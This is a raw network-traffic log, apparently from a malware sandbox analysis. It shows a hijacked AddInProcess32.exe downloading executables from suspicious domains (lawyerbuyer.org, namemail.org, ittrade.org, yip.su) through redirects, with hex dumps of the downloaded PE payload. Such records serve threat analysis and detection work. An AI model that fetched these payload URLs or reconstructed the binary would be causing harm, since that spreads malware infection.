                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1024INData Raw: 54 0c 04 0f b6 50 ff 88 54 0c 05 0f b6 10 88 54 0c 06 0f b6 50 01 88 54 0c 07 83 c1 04 83 c0 04 83 f9 08 72 d6 8b 4e 10 c1 e9 03 83 e1 3f 83 f9 38 b8 38 00 00 00 72 05 b8 78 00 00 00 2b c1 8d 4e 58 51 8b ce e8 d1 fe ff ff 8d 54 24 08 52 b8 08 00 00 00 8b ce e8 c0 fe ff ff 8d 46 02 83 c4 08 8d 4f 01 be 04 00 00 00 8b ff 0f b6 50 fe 88 51 ff 0f b6 50 ff 88 11 0f b6 10 88 51 01 0f b6 50 01 88 51 02 83 c0 04 83 c1 04 83 ee 01 75 db 8b 4c 24 0c 5e 33 cc e8 95 04 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc 81 ec 08 01 00 00 a1 28 c0 41 00 33 c4 89 84 24 04 01 00 00 56 8d 44 24 04 50 8d 4c 24 0c 51 c7 44 24 0c ff 00 00 00 ff 15 54 00 41 00 8d 44 24 08 33 c9 8d 70 01 8a 10 83 c0 01 84 d2 75 f7 2b c6 74 30 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 66 0f be 54
                                                                                                                                                                                                                                                            Data Ascii: TPTTPTrN?88rx+NXQT$RFOPQPQPQuL$^3(A3$VD$PL$QD$TAD$3pu+t0$d$fT
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC16384INData Raw: 54 24 20 52 50 8b 41 0c ff d0 85 c0 0f 8c d7 00 00 00 68 b0 94 41 00 e8 4a 08 00 00 6a 30 8d 4c 24 28 6a 00 51 e8 31 32 00 00 8b 44 24 28 be 01 00 00 00 83 c4 10 8d 4c 24 20 66 89 74 24 28 66 89 74 24 26 66 c7 44 24 24 cf 07 66 c7 44 24 20 30 00 66 c7 44 24 30 0d 00 c7 44 24 40 07 00 00 00 66 89 74 24 44 8b 10 8b 52 0c 51 50 ff d2 85 c0 7c 6a 68 18 95 41 00 e8 e9 07 00 00 8b 44 24 10 8b 08 83 c4 04 8d 54 24 10 52 68 80 02 41 00 50 8b 01 ff d0 85 c0 7c 44 68 98 95 41 00 e8 c3 07 00 00 8b 44 24 14 8b 08 8b 51 18 83 c4 04 56 6a 00 50 ff d2 68 00 96 41 00 e8 a7 07 00 00 68 74 96 41 00 e8 9d 07 00 00 8b 44 24 18 8b 08 8b 51 08 83 c4 08 50 c6 44 24 0f 01 ff d2 8b 44 24 18 8b 08 8b 51 08 50 ff d2 8b 44 24 0c 8b 08 8b 51 08 50 ff d2 8b 44 24 14 8b 08 8b 51 08 50
                                                                                                                                                                                                                                                            Data Ascii: T$ RPAhAJj0L$(jQ12D$(L$ ft$(ft$&fD$$fD$ 0fD$0D$@ft$DRQP|jhAD$T$RhAP|DhAD$QVjPhAhtAD$QPD$D$QPD$QPD$QP


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
36  192.168.2.5  55608  172.67.200.219  443  44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp  Bytes transferred  Direction  Data
2024-03-11 02:30:58 UTC  38  OUT  GET /ppg8x HTTP/1.1
Host: sty.ink
2024-03-11 02:30:59 UTC  1188  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Iithb1ZUUnNqMU9FODFRbG95SGNwZkE9PSIsInZhbHVlIjoiTEpIb3FVS2dYMWt4TWRacW5hTTZsNW5YT0x2YWQ0bktEUmRYRHZCZUJmMldEdWhrdm9qTEhuTUg1S1dRVTJQZkpRbzIrOXN2dnFqdDNKZWo3NW5rY1NxdUxpanNWNXpodmlmR1hCdm53aTc4UUtxQXNjZTJmZHZIQ2F5RG5Cb2IiLCJtYWMiOiIzY2U3YmRmNTY2MGExZGEzNzc3ZDA3YjUxMjliY2U1MWRjZmMxYjJmODQ4YzY0OGUwYTk0ZDNjY2NjNTllMDcyIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IkNXMFEzT2dyMTc5aXJrSlU5Q0dXdXc9PSIsInZhbHVlIjoiZ21pM0EyQklVWkozYUl5alhOVG1lL3RvNkdGR0U5WFhGV3FKTzMveHQ1a1BYR3JtdFJ6OFVNN2lQQ3Y4aVR5WGxsVHI5SVhpWW5RRktEU0Y5YmFHdHNROXd4b21FejcvUWNFa0grUTl5Zzl2b3pCekdSY0tkanc2RW9leXVEYWsiLCJtYWMiOiI4NDYyZDU1NzQ0NWJhMjI0ZWExNzAzNTI0NmNhMTAzODFkYTZiNmE1NmQ3YjFiOTY1YzAyMzExODA1N2U4NzNkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
2024-03-11 02:30:59 UTC  397  IN
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AAnauHc1UmPh0pbA1i4eXU%2BNyZVE69VJMQPkUNEjMkocRS0HV4ZQS%2FnJViNQz%2F869A33AkkxkCDFv7JSJP6MteKw1VaEB94vNwzg%2B%2BOGiGbHVcWanfK4VyJF"}],"group":"cf-nel","max_age":604800}NEL: {"
2024-03-11 02:30:59 UTC  1369  IN
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
2024-03-11 02:30:59 UTC  1369  IN
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
2024-03-11 02:30:59 UTC  880  IN
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
2024-03-11 02:30:59 UTC  6  IN  Data Raw: 31 0d 0a 0a 0d 0a
Data Ascii: 1
2024-03-11 02:30:59 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
37  192.168.2.5  55613  104.21.32.142  443  44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp  Bytes transferred  Direction  Data
2024-03-11 02:30:58 UTC  79  OUT  GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: shipofdestiny.com
2024-03-11 02:30:59 UTC  699  IN  HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eqemgt6cKf2aeXT0vm1omBv9XWX4YnUHZMZhCCtLK9vpGgxWrwB2XPc%2FAuzkrD3JQfYmHdtf2jFq4L5RSXRgyJ7xbHf9Ky0zSz4Z2ne28sTO5nnxugB5oPUrj8jCXSr%2FprGdWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820297e8d0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:59 UTC  135  IN
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
2024-03-11 02:30:59 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
38  192.168.2.5  55614  172.67.200.219  443  44264  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp  Bytes transferred  Direction  Data
2024-03-11 02:30:58 UTC  38  OUT  GET /ppg8x HTTP/1.1
Host: sty.ink
2024-03-11 02:30:59 UTC  1188  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik9OYWNSbHA3Rll5b016anZ4YjAzYnc9PSIsInZhbHVlIjoiaGtCUnNIK05pZ0wvMlZHQWNRNGEwRG56aDFCMVlyY3FGTWVSTVNrMkx5K1Uvd2o3U1JvNmhzSkFtb25uL0pXZlVWRWdsNmZZbk9pNDEyOWVqYnM3Wk5qd3VPNXBsaktOQXp0Zi9XaXVETzhCNXV1RkpxTEd1Ymg1OXFDeTVMNngiLCJtYWMiOiJkYmI1ZDg0OWIxYjA5MWRiMzg1ZWRiYzhiYmQzNGY3OGQzNjAyMzg3NjQ3M2JlN2QzZTQyNWIzMjE3MjE2YWU3IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6Im14MlBUZ1JhZUZBZHpmZVpSYkdBYWc9PSIsInZhbHVlIjoiNTF4b3B3Uml6UkdmOUlwZjdoZjBuMlF4dURBWDNCaGtJUiswMVpxbkIwaW5qZW0zZExoZURVY3dWcVV1V1Q1SWZXUDZXV2dDT2FMMmV2dnI1M3VmT1YvS0tJVWI1TFdGcDVRaDA2MU1MaldQU3pDdzN6UDZoVE1rUDZ5M0duMlQiLCJtYWMiOiI0ZmE4ZmI3N2UwZDMyYzg0M2JhYWQzZWE5YmJiY2IzNGQ1NDhmOGU5NDNlYjA5YmVlZDIxM2ZiNTc0NDM3NWRkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            39192.168.2.555615172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC695INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BVDEdCrs7SQtlXMK%2FPBX5fYC8Zy6WgQI8yIQESdhElz%2FtvOZpRni9tSRGrqwXIM81xkhlzNRym%2Fxij%2F2ECgIShdZVwICWB%2Fkr%2FOpvaqvnjDcxdfcxF6kpne%2BWepOggk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820299e5c0adb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            40192.168.2.555609172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC685INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FBHvSMkwysygsSwBQaoBeQ%2BFGDRsSyVmjNW3D2VWWtSUF92%2FIzTDfMkQoH19Fg9tE2oYBBfhDI2jgXiK2jKtpWJBrCOjSHyIZ5kJjhV3cJuR7Y5mdBF9SSMFSWu49N4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820299f740ad1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            41192.168.2.555618104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC110OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l5mKmkT3oAdAxlKhxLepxzZKGtnttD%2FzDO7HQ4iNY%2FkGd7eAROpTDKNVx22cwM8AT31Z5uBlp7buvhmcx5QAd9ctQ0SF2nesF%2Bmcqd0QT8HDBeK5qYp%2BtCnQzUXppimqbaM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202a6c4c09fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 02 00 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 5b 04 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00
                                                                                                                                                                                                                                                            Data Ascii: [YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,54058
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 11 e8 c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 55619 | 172.67.169.89 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:58 UTC | 41 | OUT | GET /RNWPd.exe HTTP/1.1
Host: yip.su
2024-03-11 02:30:59 UTC | 914 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
memory: 0.36199188232421875
expires: Mon, 11 Mar 2024 02:30:59 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 11 Mar 2024 02:30:57 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NswEYml%2FTbMhCNMjipNcWb3Y%2F4AjkfNOpr2hF2%2Fh%2Bj7Fy3h2mtWNes%2FHP%2Fi7w1aKRSu1m9DEMUaU0d3BqOSU%2FP%2Batavx7yG%2BAe8VySixDDkmqJ%2BzanXJung%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8628202aaa4009ff-LAS
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 55620 | 104.20.68.143 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
